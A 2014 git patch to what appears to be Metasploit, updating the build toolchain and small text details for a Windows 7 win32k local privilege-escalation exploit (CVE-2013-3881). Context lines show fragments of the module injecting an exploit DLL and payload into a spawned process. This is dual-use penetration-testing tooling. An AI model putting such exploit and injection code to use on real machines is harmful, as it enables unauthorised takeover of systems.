From 0ac1acda70765844b149bf3a18bf833651a26e48 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 10 Feb 2014 09:35:07 -0500
Subject: [PATCH] Upgrade toolchain to Visual Studio 2013 v120.

---
 .../cve-2013-3881/cve-2013-3881/cve-2013-3881.c        |  8 ++++++--
 .../cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj  |  8 ++++----
 modules/exploits/windows/local/win32k_null_page.rb     | 10 +++++-----
 3 files changed, 15 insertions(+), 11 deletions(-)

diff --git a/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.c b/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.c
index 8f5ef28b0a..9389277e09 100755
--- a/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.c
+++ b/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.c
@@ -3,7 +3,7 @@
  * Date: February 5, 2014
  * Vulnerability Discovery: Seth Gibson and Dan Zentner of Endgame
  * Exploit Author: Spencer McIntyre
- * Version: Windows 7 SP1
+ * Version: Windows 7 SP0/SP1
  * Tested on: Windows 7 SP0/SP1
  * CVE-2013-3881 MS13-081
  * References:
@@ -22,7 +22,11 @@
 #define WIN32_NO_STATUS
 #include <windows.h>
 #undef WIN32_NO_STATUS
-#include <winternl.h>
+
+#ifndef _NTDEF_
+typedef __success(return >= 0) LONG NTSTATUS;
+typedef NTSTATUS *PNTSTATUS;
+#endif
 
 #define TABLE_BASE 0xff910000
 
diff --git a/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj b/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj
index b8d7835d89..634f972b10 100755
--- a/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj
+++ b/external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <ItemGroup Label="ProjectConfigurations">
     <ProjectConfiguration Include="Debug|Win32">
       <Configuration>Debug</Configuration>
@@ -20,14 +20,14 @@
     <UseDebugLibraries>true</UseDebugLibraries>
     <WholeProgramOptimization>false</WholeProgramOptimization>
     <CharacterSet>MultiByte</CharacterSet>
-    <PlatformToolset>v90</PlatformToolset>
+    <PlatformToolset>v120</PlatformToolset>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
     <ConfigurationType>DynamicLibrary</ConfigurationType>
     <UseDebugLibraries>false</UseDebugLibraries>
     <WholeProgramOptimization>false</WholeProgramOptimization>
     <CharacterSet>MultiByte</CharacterSet>
-    <PlatformToolset>v90</PlatformToolset>
+    <PlatformToolset>v120</PlatformToolset>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
   <ImportGroup Label="ExtensionSettings">
@@ -82,4 +82,4 @@
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
   <ImportGroup Label="ExtensionTargets">
   </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
diff --git a/modules/exploits/windows/local/win32k_null_page.rb b/modules/exploits/windows/local/win32k_null_page.rb
index 7987745f81..276d38144c 100644
--- a/modules/exploits/windows/local/win32k_null_page.rb
+++ b/modules/exploits/windows/local/win32k_null_page.rb
@@ -22,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Local
       'Description'    => %q{
         This module exploits a vulnerability in win32k.sys where under
         specific conditions TrackPopupMenuEx will pass a NULL pointer to
-        the EndMenuState. This module has been tested successfully on
-        Windows 7 SP0 and Windows 7 SP1.
+        the MNEndMenuState procedure. This module has been tested
+        successfully on Windows 7 SP0 and Windows 7 SP1.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -102,15 +102,15 @@ class Metasploit3 < Msf::Exploit::Local
     process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
     print_good("Process #{process.pid} launched.")
 
-    print_status("Reflectively injecting the exploit DLL into #{process.getpid}...")
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
     library_path = ::File.join(Msf::Config.data_directory, "exploits",
                                "cve-2013-3881", "cve-2013-3881.x86.dll")
     library_path = ::File.expand_path(library_path)
 
-    print_status("Injecting exploit into #{process.getpid} ...")
+    print_status("Injecting exploit into #{process.pid}...")
     exploit_mem, offset = inject_dll_into_process(process, library_path)
 
-    print_status("Exploit injected. Injecting payload into #{process.getpid}...")
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
     payload_mem = inject_into_process(process, payload.encoded)
 
     # invoke the exploit, passing in the address of the payload that